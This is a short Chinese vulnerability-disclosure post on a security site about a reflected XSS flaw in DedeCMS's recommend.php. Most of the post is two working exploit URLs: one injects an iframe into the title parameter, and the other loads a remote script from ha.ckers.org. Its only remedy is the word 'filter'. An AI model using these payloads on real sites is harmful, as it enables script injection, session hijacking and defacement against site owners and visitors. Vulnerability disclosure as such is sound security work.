起风网|
Dedecms 一处 XSS漏洞,有图就有真相 http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//www.baidu.com%3E%3C/iframe%3E http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
修复方案:过滤! |
-
上一篇: 新网域名MYDNS解析系统header sql注入 – 网站安全
下一篇: 某通用型大学校报发布系统注入漏洞 – 网站安全
评论前必须登录!
立即登录